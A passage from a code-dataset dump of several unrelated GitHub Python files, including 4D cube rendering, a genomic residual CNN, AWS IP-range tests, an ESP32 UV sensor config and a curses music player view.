c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c1.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c2.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c2.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c3.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c3.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c4.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c4.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, 
c5.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c5.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c0.key, c6.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c6.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n c7.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c0.cube_center)\n #\n f1 = get_common_face(c6.key, c7.key)\n fc1 = c6.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n c7.rotate(ax1, ax2, ax3, np.pi*i/200.0, ref_pt=c6.cube_center)\n\n tf.plot(draw, r, persp=persp, rgba=(120, 23, 110, 30))\n im.save(\"Images//RotatingCube//im\" +\n str(i).rjust(4, '0') +\n \".png\")\n\n\ndef open_tsrct_proper(adj=None):\n for i in range(11):\n tt = TsrctCubeTree()\n if adj is not None:\n tt.adj = adj\n tt.bfs('000-')\n tt.reset_vert_col()\n tt.theta = np.pi/20.0*i\n tt.dfs_flatten('000-')\n im = Image.new(\"RGB\", (512, 512), (255, 255, 255))\n draw = ImageDraw.Draw(im, 'RGBA')\n r=rotation(4, np.pi*17/60.0)\n tt.plot(draw, r, rgba=(100,100,100,40))\n im.save(\"Images//RotatingCube//im\" +\n str(i).rjust(4, '0') +\n \".png\")\n\n\ndef tst():\n for i in range(31):\n tt = TsrctCubeTree()\n tt.adj = {\n '000-':['-000','+000','00-0','00+0'],\n '00-0':['0+00','000+'],\n '00+0':['0-00']\n }\n tt.bfs('000-')\n tt.reset_vert_col()\n tt.theta = min(np.pi/20.0*i, np.pi/2)\n tt.dfs_flatten('000-')\n im = Image.new(\"RGB\", (512, 512), (255, 255, 255))\n draw = ImageDraw.Draw(im, 'RGBA')\n r=np.eye(4)\n r2_3d = axis_rotation(np.array([0,0,0]), np.array([1,1,1]),\n np.pi/4+2*np.pi/20.0*i)[:3,:3]\n r[:3,:3] = r2_3d\n tt.plot(draw, r, rgba=(100,100,100,40))\n tt.cube_map['0-00'].plot_perspective(draw, r, 5,\n rgba=(255,0,0,50), \n shift=np.array([256, 256, 0, 0]),\n scale=35)\n tt.cube_map['0+00'].plot_perspective(draw, r, 5,\n rgba=(0,255,0,50),\n shift=np.array([256, 256, 0, 0]),\n scale=35)\n tt.cube_map['-000'].plot_perspective(draw, r, 5,\n rgba=(255,255,0,50),\n shift=np.array([256, 256, 0, 0]),\n scale=35)\n tt.cube_map['+000'].plot_perspective(draw, r, 5,\n rgba=(255,255,0,50),\n shift=np.array([256, 256, 0, 0]),\n scale=35)\n im.save(\"Images//RotatingCube//im\" +\n str(i).rjust(4, '0') +\n \".png\")\n\n","repo_name":"ryu577/pyray","sub_path":"pyray/shapes/fourd/tsrct_cube_graph.py","file_name":"tsrct_cube_graph.py","file_ext":"py","file_size_in_byte":12783,"program_lang":"python","lang":"en","doc_type":"code","stars":715,"dataset":"github-code","pt":"5"} +{"seq_id":"29911873252","text":"\"\"\"A module for compiling a deep, residual CNN.\"\"\"\nimport numpy as np\n\nfrom Bio.motifs import minimal\nfrom tensorflow.keras import backend, layers, models, utils\n\n\ndef make_res_network(shape: tuple[int, int]):\n \"\"\"Makes deep, residual network.\"\"\"\n input_bases, _ = shape\n\n inputs = layers.Input(shape=shape)\n x = layers.Conv1D(32, 1)(inputs)\n\n # 100 = ([2*(6-1)*1] * 5)\n # 500 = ([2*(6-1)*1] * 10) + ([2*(6-1)*4] * 10)\n # 1500 = ([2*(6-1)*1] * 10) + ([2*(6-1)*4] * 10) + ([2*(6-1)*10] * 10)\n\n if input_bases > 99:\n for _ in range(10):\n x = _make_res_block(x, filters=32, kernel_size=6, dilation_rate=1)\n\n if input_bases > 499:\n for _ in range(10):\n x = _make_res_block(x, filters=32, kernel_size=6, dilation_rate=4)\n\n if input_bases > 1499:\n for _ in range(10):\n x = _make_res_block(x, filters=32, kernel_size=6, dilation_rate=10)\n\n x = layers.Flatten()(x)\n x = layers.Dense(1, activation='sigmoid')(x)\n\n res_net = 
models.Model(inputs, x)\n res_net.compile(\n optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['acc', 'AUC']\n )\n\n return res_net\n\n\ndef _make_res_block(x, filters, kernel_size, dilation_rate):\n \"\"\"Makes residual block.\"\"\"\n shortcut = x\n\n x = layers.BatchNormalization()(x)\n x = layers.ReLU()(x)\n x = layers.Conv1D(\n filters, kernel_size, dilation_rate=dilation_rate, padding='same')(x)\n\n x = layers.BatchNormalization()(x)\n x = layers.ReLU()(x)\n x = layers.Conv1D(\n filters, kernel_size, dilation_rate=dilation_rate, padding='same')(x)\n\n x = layers.add([x, shortcut])\n\n return x\n\n\ndef one_hot_encode(seq) -> np.ndarray:\n \"\"\"Return a one-hot encoded representation of a genomic sequence.\"\"\"\n base_map = {'A': 0, 'C': 1, 'G': 2, 'T': 3, 'N': 4}\n int_seq = [base_map[base] for base in seq]\n\n return utils.to_categorical(int_seq, num_classes=5)[:, :-1]\n\n\ndef viz_conv_net(model_path, x_data_path, save_path):\n \"\"\"Visualizes the 1st layer of a convolutional neural network.\n \"\"\"\n model = models.load_model(model_path)\n x_data = np.load(x_data_path)\n\n conv_layer1 = model.get_layer(model.layers[4].name)\n num_motifs = conv_layer1.filters\n\n window = conv_layer1.kernel_size[0]\n func = backend.function(\n [model.inputs[0]],\n [backend.max(conv_layer1.output, axis=1),\n backend.argmax(conv_layer1.output, axis=1)]\n )\n\n max_acts, max_inds = func([x_data])\n\n motifs = np.zeros((num_motifs, window, 4))\n nsites = np.zeros(num_motifs)\n\n for m in range(num_motifs):\n for n in range(len(x_data)):\n if max_acts[n, m] > 0.0:\n if len(x_data[n, max_inds[n, m]:max_inds[n, m] + window]) == 6:\n nsites[m] += 1\n motifs[m] += x_data[\n n, max_inds[n, m]:max_inds[n, m] + window]\n\n with open(save_path, 'w') as file:\n file.write(\n \"MEME version 5.3.3\\n\\n\"\n \"ALPHABET= ACGT\\n\\n\"\n \"Background letter frequencies (from uniform background):\\n\"\n \"A 0.25 C 0.25 G 0.25 T 0.25\\n\\n\")\n\n for m in range(num_motifs):\n if nsites[m] == 0:\n continue\n\n file.write(\n f\"MOTIF {m}\\n\"\n f\"letter-probability matrix: \"\n f\"alength= 4 w= {window} \"\n f\"nsites= {int(nsites[m])} \"\n f\"E= 0.00\\n\"\n )\n\n for n in range(window):\n adenine, cytosine, guanine, thymine = tuple(\n motifs[m, n, 0:4] / np.sum(motifs[m, n, 0:4]))\n\n file.write(\n f\"{adenine:.6f} \"\n f\"{cytosine:.6f} \"\n f\"{guanine:.6f} \"\n f\"{thymine:.6f}\\n\"\n )\n\n file.write(\"\\n\")\n","repo_name":"fiszbein-lab/hybrid_exons","sub_path":"res_net.py","file_name":"res_net.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28855609785","text":"# # for x in 'hello':\n# # print(x.upper())\n# #\n# # for y in [1, 2, 3, 4]:\n# # print(y **2)\n#\n# # for num1 in range(10):\n# # for num2 in range(10):\n# # for num3 in range(10):\n# # for num4 in range(10):\n# # print(num1, num2, num3, num4)\n#\n# squares = []\n# cubes = []\n# for num in range(101):\n# squares.append(([num, num ** 2, num **3]))\n# cubes.append((num, num ** 3))\n# print(squares)\n#\n# for pair in squares:\n# print(f'Square of {pair[0]} is {pair[1]}')\n\n# people = (['Jack', 'Smith', 25], ['Mary', 'Gold', 20], ['Bob', 'Dylan', 45])\n# for name, surname, age in people:\n# result = f'Hello {name} {surname}. 
You are {age} years old.'\n# if age < 18:\n# result += ' You are teenager.'\n# else:1\n# result += 'You are adult.'\n# print(result)\n\n# x = 0\n# while x < 100:\n# print(x)\n# x +=1\n\n# step_len = 0.8\n# current_position = 0\n# total_steps = 0\n# distance_to_target = float(input('How many km you want to travel: ')) * 1000\n# while current_position < distance_to_target:\n# current_position += step_len\n# total_steps += 1\n#\n# print(total_steps)\n#\n# x = 0\n# while True:\n# if x > 10:\n# break\n# print(x)\n# x += 1\n#\n# for letter in 'python':\n# if letter == 'h':\n# continue\n# elif letter == 'n':\n# break\n# print(letter)\n\n# user_choice = input('Please ')\n# if user_choice == '1':\n# pass\n# elif user_choice == '2'\n# pass\n\n#38803160272\nwhile True:\n user_input = input('Please enter ID code or type \"exit\": ')\n if user_input.lower() == 'exit':\n break\n try:\n int(user_input)\n if len(user_input) != 11:\n raise UserWarning\n except ValueError:\n print('ID code is not numeric!')\n except UserWarning:\n if len(user_input) > 11:\n print('Code is too long!')\n else:\n print('Code is too short!')\n else:\n while True:\n user_choice = input('Please choose\\n'\n '1.Gender\\n'\n '2.Date of birth\\n' #dd.mm.yyyy\n '3.Region\\n'\n '4.Validate\\n'\n '5.Change ID\\n'\n '0.Exit\\n'\n '--> ')\n if user_choice == '1':\n if user_input[0] not in '09':\n if int(user_input[0]) % 2 == 0:\n print('You are female!')\n else:\n print('You are male!')\n elif user_choice == '2':\n f_year = user_input[1] + user_input[2]\n year = '19' + f_year\n day = user_input[5] + user_input[6]\n f_month = user_input[3] + user_input[4]\n print(day + ':' + f_month + ':' + year)\n elif user_choice == '3':\n pass\n elif user_choice == '4':\n pass\n elif user_choice == '5':\n break\n elif user_choice == '0':\n quit()\n else:\n print('Choise is out of range!')\n","repo_name":"SpektraQA/auto_home.py","sub_path":"course/001_simple/004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14421516323","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"recmetrics-pyspark\",\n version=\"0.0.1\",\n author=\"Camilo Akimushkin Valencia\",\n author_email=\"camilo.akimushkin@gmail.com\",\n description=\"A library of recommender systems metrics for big data\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/camiloakv/recmetrics-pyspark\",\n packages=[\"recmetrics_pyspark\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"camiloakv/recmetrics-pyspark","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"582942948","text":"import os\r\nfrom pathlib import Path\r\nfrom ipaddress import IPv4Network\r\nfrom urllib.request import urlretrieve\r\n\r\nimport pytest\r\n\r\nfrom ips import ServiceIPRange, parse_ipv4_service_ranges, get_aws_service_range\r\n\r\nURL = \"https://bites-data.s3.us-east-2.amazonaws.com/ip-ranges.json\"\r\nTMP = os.getenv(\"TMP\", \"/tmp\")\r\nPATH = Path(TMP, \"ip-ranges.json\")\r\nIP = IPv4Network(\"192.0.2.8/29\")\r\n\r\n\r\n@pytest.fixture(scope=\"module\")\r\ndef json_file():\r\n \"\"\"Import 
data into tmp folder\"\"\"\r\n urlretrieve(URL, PATH)\r\n return PATH\r\n\r\n\r\n@pytest.fixture(scope=\"module\")\r\ndef service_ranges():\r\n service = \"CLOUD9\"\r\n region = \"eu-west-1\"\r\n CIDRS = [\r\n \"10.1.18.0/24\",\r\n \"192.168.1.0/27\",\r\n \"192.0.2.8/29\",\r\n \"192.168.1.0/24\"\r\n ]\r\n\r\n return [\r\n ServiceIPRange(\r\n service=service,\r\n region=region,\r\n cidr=IPv4Network(cidr)\r\n )\r\n for cidr in CIDRS\r\n ] \r\n\r\n\r\ndef test_parse_ip4_service_ranges(json_file):\r\n service_ranges = parse_ipv4_service_ranges(json_file)\r\n assert len(service_ranges) == 1886\r\n assert isinstance(service_ranges, list)\r\n assert isinstance(service_ranges[0], ServiceIPRange)\r\n\r\n\r\ndef test_ServiceIPRange_string_representaiton():\r\n service = \"CLOUD9\"\r\n region = \"eu-west-1\"\r\n cidr = IP\r\n\r\n expected = f\"{cidr} is allocated to the {service} service in the {region} region\"\r\n assert str(ServiceIPRange(service, region, cidr)) == expected\r\n\r\n\r\ndef test_invalid_ip_address():\r\n service = \"CLOUD9\"\r\n region = \"eu-west-1\"\r\n cidr = IP\r\n invalid_ip = \"192.0.2.9/24\" # Invalid IP. This is a valid CIDR\r\n\r\n service_ranges = [ServiceIPRange(service, region, cidr)]\r\n with pytest.raises(ValueError) as exc:\r\n get_aws_service_range(invalid_ip, service_ranges)\r\n\r\n assert str(exc.value) == \"Address must be a valid IPv4 address\"\r\n\r\n\r\ndef test_ipv4_address_in_service_ranges(service_ranges):\r\n actual = get_aws_service_range(\"10.1.18.15\", service_ranges)\r\n expected = [service_ranges[0]]\r\n assert actual == expected\r\n\r\n # 192.168.1.16 is in the subnect of both\r\n # 192.168.1.0/27 and 192.168.1.0/24\r\n actual = get_aws_service_range(\"192.168.1.16\", service_ranges)\r\n expected = [service_ranges[1], service_ranges[3]]\r\n assert actual == expected\r\n\r\n\r\ndef test_ip4_address_not_in_service_ranges(service_ranges):\r\n # 192.0.2.16 is outside 192.0.2.8/29\r\n # 192.0.2.8/29 : 192.0.2.8 - 192.0.2.7\r\n assert not get_aws_service_range(\"192.0.2.16\", service_ranges)\r\n\r\n # 192.168.1.33/27 is outside 192.168.1.0/27\r\n # 192.168.1.0/27 : 192.168.1.0 - 192.168.1.31\r\n assert not get_aws_service_range(\"192.168.2.33\", service_ranges)\r\n\r\n","repo_name":"realnitinworks/bitesofpy","sub_path":"243/test_ips.py","file_name":"test_ips.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35635813776","text":"import heapq\n\nimport util\n\n\n@util.apply(sorted)\ndef control():\n for a in range(10, 100):\n for b in range(10, a + 1):\n yield a * b, b, a\n\n\ndef strat1():\n a = 10\n b = 10\n cache = {a: (b, a * b)}\n max_key = a\n\n while True:\n a, (b, prod) = min(cache.items(), key=lambda item: item[1][1])\n if a == max_key:\n max_key += 1\n cache[max_key] = (\n max_key, max_key * max_key,\n )\n yield prod, a, b\n cache[a] = (b + 1, a * (b + 1))\n\n\ndef strat2():\n a = 10\n b = 10\n cache = [(a * b, a, b)]\n max_key = a\n\n while True:\n prod, a, b = heapq.heappop(cache)\n if a == max_key:\n max_key += 1\n heapq.heappush(cache, (max_key * max_key, max_key, max_key))\n yield prod, a, b\n b += 1\n heapq.heappush(cache, (a * b, a, b))\n\n# ---\n\ndef compare_strats(*strat_fns):\n import more_itertools\n\n for iteration_results in zip(*(fn() for fn in strat_fns)):\n print(iteration_results)\n if not more_itertools.all_equal(ab for ab, _, _ in iteration_results):\n break\n\n\ndef main(strat):\n for ab, a, b in strat():\n print(ab, a, 
b)\n\n\nif __name__ == '__main__':\n # compare_strats(control, strat1, strat2)\n main(strat2)\n","repo_name":"orez-/python-sundry","sub_path":"ordered_product.py","file_name":"ordered_product.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26636784713","text":"import sys\n\nfrom datetime import datetime\n\nfrom .DL import DelhiDB\nfrom .GA import GoaDB\nfrom .HR import HaryanaDB\nfrom .KA import KarnatakaDB\nfrom .KL import KeralaDB\nfrom .MH import MaharashtraDB\nfrom .MP import MadhyaPradeshDB\nfrom .PB import PunjabDB\nfrom .TG import TelanganaDB\nfrom .TN import TamilNaduDB\nfrom .UK import UttarakhandDB\nfrom .WB import WestBengalDB\n\nfrom .Metadata import MetadataDB\n\nclass DBMain(object):\n\n def __init__(self, datadir):\n self.datadir = datadir\n\n self.setup_tables()\n self.record_table_metadata()\n\n def setup_tables(self):\n\n self.states = {\n 'DL': DelhiDB(datadir=self.datadir),\n 'GA': GoaDB(datadir=self.datadir),\n 'HR': HaryanaDB(datadir=self.datadir),\n 'KA': KarnatakaDB(datadir=self.datadir),\n 'KL': KeralaDB(datadir=self.datadir),\n 'MH': MaharashtraDB(datadir=self.datadir),\n 'MP': MadhyaPradeshDB(datadir=self.datadir),\n 'PB': PunjabDB(datadir=self.datadir),\n 'TG': TelanganaDB(datadir=self.datadir),\n 'TN': TamilNaduDB(datadir=self.datadir),\n 'UK': UttarakhandDB(datadir=self.datadir),\n 'WB': WestBengalDB(datadir=self.datadir),\n }\n\n self.metatable = MetadataDB(datadir=self.datadir)\n\n def insert_for_state(self, state, data):\n\n obj = self.states[state]\n obj.insert_row(data)\n\n def insert_metadata(self, data):\n self.metatable.insert_row(data)\n\n def record_table_metadata(self):\n \"\"\" Record all the state tables information in the database \"\"\"\n\n for state_name, db_obj in self.states.items():\n for tableobj in db_obj.tables.values():\n\n datum = {\n 'table_name': tableobj.table_name,\n 'state': state_name,\n 'description': tableobj.table_desc\n }\n\n row = {'table-overview': datum}\n self.insert_metadata(row)\n\n def record_bulletin_links(self, data):\n \"\"\" Record all the bulletins link in the database \"\"\"\n\n for state_name, linkdata in data.items():\n for datestr, href in linkdata.items():\n tablerow = {\n 'date': datestr,\n 'state': state_name,\n 'bulletin_link': href\n }\n row = {'bulletin-links': tablerow}\n self.insert_metadata(row)\n\n def record_db_metadata(self):\n \"\"\" Record DB Metadata \"\"\"\n\n # Store last updated\n currtime = datetime.now()\n timestr = f'{currtime.year}-{currtime.month:02d}-{currtime.day:02d}'\n tablerow = {'key': 'last-updated', 'value': timestr}\n row = {'db-properties': tablerow}\n self.insert_metadata(row)\n\n\nif __name__ == '__main__':\n datadir = str(sys.argv[1])\n obj = DBMain(datadir)\n","repo_name":"IBM/covid19-india-data","sub_path":"data_extractor/db/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"5"} +{"seq_id":"33446022158","text":"# General\nINTERVAL_WAKE_SENSOR = int(5 * 60 * 1000)\nNUM_READINGS_FILTER = 5\nSLEEP_SAMPLING = 1.1\nPRINT_ENABLE = False\nSEND_TO_DB = False\nCHANGE_MAC = False\nWDT_WAIT = 1000 * 30\nWIFI_WAIT = 1000 * 20\n\n# URL for DB API write operation\nURL = \"URL_to_influxdb_write_endpoint_here\"\nJWT_TOKEN = \"authorization_token_for_operation_above\"\n\n# Wi-fi\nNEW_MAC = None\nWIFI_SSID = \"wifi_ssid_here\"\nWIFI_PASSWORD = \"wifi_password_here\"\n\n# 
Pinout (GPIO numbering)\nPIN_LED_BLINKER = 2 # ESP32 D1 mini\nPIN_ADC_UV = 34 # ADC0 ESP32 D1 mini\nPIN_ADC_BATTERY = 35 # ADC1 ESP32 D1 mini\nPIN_POWER_SENSOR = 27 # pin used to temporarily provide power to UV sensor\nPIN_CHECK_FOR_WEBREPL = 21\nPIN_TRIGGER_WEBREPL = 17\n\n# Sensor V to UV index lookup table\nuv_index_table = [\n [1, 0.227],\n [2, 0.318],\n [3, 0.408],\n [4, 0.503],\n [5, 0.606],\n [6, 0.696],\n [7, 0.795],\n [8, 0.881],\n [9, 0.976],\n [10, 1.079],\n [11, 1.170]\n]\n\n","repo_name":"bandaangosta/uv_station","sub_path":"src/station_uv/config_general.py","file_name":"config_general.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35283456147","text":"def akkerman_fun(m, n):\n if m == 0:\n return n + 1\n elif m > 0 and n == 0:\n return akkerman_fun(m - 1, 1)\n elif m > 0 and n > 0:\n return akkerman_fun(m - 1, akkerman_fun(m, n - 1))\n\n\ndef akkerman_lesson():\n print('lesson-2')\n m_n = [[0, 1], [1, 1], [2, 1], [3, 4]]\n for m, n in m_n:\n print(f'Result for akkerman({m}, {n}): {akkerman_fun(m, n)}')\n\n\ndef easy_numbers_lesson():\n n_count = 80\n numbers = set(range(2, n_count + 1))\n easy_numbers = numbers.copy()\n\n for number in numbers:\n first = True\n for next_number in range(number, n_count + 1, number):\n if first:\n first = False\n else:\n if next_number in easy_numbers:\n easy_numbers.remove(next_number)\n\n easy_numbers = sorted(set(easy_numbers))\n print(list(easy_numbers))\n\n\ndef evclidus_lesson():\n a = 3480\n b = 17400\n max_num = max(a, b)\n min_num = min(a, b)\n\n left = max_num % min_num\n\n while left != 0:\n max_num = min_num\n min_num = left\n left = max_num % min_num\n\n print(f\"Наибольший общий делитель = {min_num}\")\n\n\ndef evclidus_recursion_lesson():\n\n def evclidus(min, max):\n left = max % min\n if left == 0:\n return min\n else:\n return evclidus(left, min)\n\n max = 17400\n min = 3480\n\n print(evclidus(min, max))\n\n\nif __name__ == '__main__':\n # akkerman_lesson()\n # easy_numbers_lesson()\n # evclidus_lesson()\n evclidus_recursion_lesson()\n","repo_name":"kineugene/lessons-algorithms","sub_path":"lesson-2/lesson.py","file_name":"lesson.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38935260266","text":"from django import forms\nfrom .models import AluFileTermo,CharacteristikaFile\n\n\nclass FileFormTermo(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(FileFormTermo, self).__init__(*args, **kwargs)\n self.fields['file'].widget.attrs.update({\n 'class': 'form-control-file'\n })\n class Meta:\n model =AluFileTermo\n fields =['file','file_type']\n\nclass FileFormChar(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(FileFormChar, self).__init__(*args, **kwargs)\n self.fields['file'].widget.attrs.update({\n 'class': 'form-control-file'\n })\n class Meta:\n model =CharacteristikaFile\n fields =['file','file_type']","repo_name":"MuzaffarTursunov96/akfa_project","sub_path":"aluminiytermo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6785267969","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n '''\n Given an array of strings, this groups the anagrams together in lists\n Returns a list of all grouped together anagrams\n '''\n 
dict = {}\n for word in strs:\n key = ''.join(sorted(word))\n if key not in dict:\n dict[key] = []\n dict[key].append(word)\n return dict.values()","repo_name":"Broadan26/LeetCodeGrind","sub_path":"group-anagrams/group-anagrams.py","file_name":"group-anagrams.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14499873243","text":"# -*- coding: utf-8 -*-\n\nimport curses\n\nfrom ..player.playlist import Playlist\nfrom ..player.track import Track\nfrom ..player.artist import Artist\nfrom ..player.album import Album\nfrom ..player.list import List\nfrom ..player.item import Item\n\n\nclass Question(object):\n\n def __init__(self, view, text, y, x):\n self._view = view\n self._text = text\n self._y = y\n self._x = x\n\n def display(self):\n curses.setsyx(self._y, self._x)\n self._view.scr.clrtoeol()\n self._view.string(self._text, 0, 0)\n curses.echo()\n curses.curs_set(1)\n self._view.scr.refresh()\n\n return self\n\n def response(self):\n response = self._view.scr.getstr(0, len(self._text) + 1)\n curses.noecho()\n curses.curs_set(0)\n\n return response\n\n\nclass View(object):\n\n def __init__(self, ui):\n self.ui = ui\n self.scr = ui.stdscr\n self.player = ui.player\n self.colors = ui.colors\n self.height, self.width = self.scr.getmaxyx()\n self.header_height = 2\n self.footer_height = 2\n self.viewheight = self.height - self.header_height - self.footer_height\n self.current = None\n self.previous = []\n self.item = 0\n self.current_item = None\n self._search_mode = False\n\n curses.curs_set(0)\n\n self.scr.timeout(17)\n\n @property\n def elements(self):\n if isinstance(self.current, List):\n elements = self.current.items\n elif isinstance(self.current, Artist):\n elements = self.current.albums\n elif isinstance(self.current, Playlist):\n elements = self.current.tracks\n else:\n elements = self.current[1]\n\n return elements\n\n def display(self):\n self.erase()\n if not self.in_search_mode():\n self.header()\n\n self.footer()\n\n self.main()\n self.refresh()\n\n def header(self):\n locstring = [('Melomaniac', 'blue')]\n for i in self.previous[1:]:\n i = i[0]\n locstring.append((' > ', 'header-sep'))\n if isinstance(i, Artist):\n locstring.append((i.name, 'cyan'))\n elif isinstance(i, Playlist):\n locstring.append((i.name, 'magenta'))\n elif isinstance(i, List):\n locstring.append((i.name, ''))\n elif isinstance(i, Item):\n locstring.append((i.name, ''))\n else:\n if isinstance(i, tuple):\n locstring.append((i[0], 'header-text'))\n else:\n locstring.append((i, 'header-text'))\n\n if self.previous:\n locstring.append((' > ', 'header-sep'))\n if isinstance(self.current, List):\n locstring.append((self.current.name, ''))\n elif isinstance(self.current, Item):\n locstring.append((self.current.name, ''))\n elif isinstance(self.current, Playlist):\n locstring.append((self.current.name, 'magenta'))\n elif isinstance(self.current, Artist):\n locstring.append((self.current.name, 'cyan'))\n else:\n locstring.append((self.current[0], 'header-text'))\n\n self.string(locstring, 0, 0)\n for i in range(0, self.width):\n self.scr.addch(1, i, '-')\n\n def footer(self):\n if self.player.track is not None:\n self.track_footer()\n else:\n for i in range(0, self.width):\n self.scr.addch(self.height - 10, i, ' ')\n\n self.string(self.player.status, self.height - 1, 0)\n\n def get_search(self):\n search = self.scr.getstr(0, 13)\n curses.noecho()\n curses.curs_set(0)\n\n return search\n\n def search_mode(self, 
search_mode):\n self._search_mode = search_mode\n\n #if search_mode is True:\n # curses.setsyx(0, 0)\n # self.scr.clrtoeol()\n # s = 'Search for: '\n # self.line(s, 0, len(s), color='blue')\n # curses.echo()\n # curses.curs_set(1)\n\n return self\n\n def in_search_mode(self):\n return self._search_mode\n\n def ask(self, y, x, question):\n return Question(self, question, y, x).display()\n\n def main(self):\n elements = self.elements\n\n count = len(elements)\n top_half = self.viewheight // 2\n bottom_half = self.viewheight - top_half\n if count <= self.viewheight:\n cl = 0\n elif (self.item - top_half) < 0:\n cl = 0\n elif (self.item + bottom_half) > (count - 1):\n cl = count - self.viewheight\n else:\n cl = self.item - top_half\n\n for i in range(cl, cl + self.viewheight):\n if i < count:\n element = elements[i]\n if isinstance(element, Playlist):\n if not element.name:\n continue\n\n s = ' {} '.format(element.name)\n elif isinstance(element, List):\n s = ' {} '.format(element.name)\n elif isinstance(element, Item):\n s = ' {} '.format(element.name)\n elif isinstance(element, Artist):\n s = ' {} '.format(element.name)\n elif isinstance(element, Track):\n if isinstance(self.current, Album):\n number = element.number\n s = ' {:3d}. {}'.format(number, element.title, element.artist)\n elif isinstance(self.current, Playlist):\n number = i + 1\n s = ' {:3d}. {} - {}'.format(number, element.title, element.artist)\n else:\n number = element.number\n s = ' {:3d}. {} - {}'.format(number, element.title, element.artist)\n\n max_song_width = self.width - 6\n s = s[:max_song_width] + ' ' * (self.width - 6 - len(s)) + element.duration_string + ' '\n\n if i == self.item:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width, self.colors.get('cyan_reverse'))\n elif self.player.track is not None and self.player.track.id == element.id:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width, self.colors.get('yellow'))\n else:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width)\n\n continue\n else:\n # Assuming main menu tuple\n s = element[0]\n\n slen = len(s)\n s = s + ' ' * (self.width - slen)\n try:\n if i == self.item:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width, self.colors.get('cyan_reverse'))\n else:\n self.scr.addnstr(self.header_height + i - cl, 0, s, self.width)\n except curses.error:\n pass\n else:\n break\n\n def track_footer(self):\n done = int(self.width * self.player.track_percent / 100)\n for i in range(0, done):\n self.scr.addch(self.height - 2, i, '-', self.colors.get('green'))\n\n for i in range(done, self.width):\n self.scr.addch(self.height - 2, i, '-')\n\n self.string(\n [self.player.status, ' > ',\n (self.player.track.artist, 'cyan'), ' - ', (self.player.track.title, 'yellow')],\n self.height - 1, 0, self.width - 6)\n\n # Current time\n current_time = '{:02d}:{:02d}'.format(\n self.player.track_current // 60,\n self.player.track_current % 60\n )\n self.scr.addstr(\n self.height - 1, self.width - 6,\n current_time, self.colors.get('green')\n )\n\n def string(self, string, y, x, width=None):\n if width is None:\n width = self.width\n\n if not isinstance(string, (list, tuple)):\n string = [(string, '')]\n\n for i in string:\n if isinstance(i, str):\n s = i\n col = None\n else:\n s = i[0]\n if len(i) == 2:\n col = i[1]\n else:\n col = None\n\n if (self.width - x) > 0:\n if col and col in self.colors:\n self.scr.addnstr(y, x, s, width - x, self.colors.get(col))\n else:\n self.scr.addstr(y, x, s, width - x)\n\n x += len(s)\n\n def 
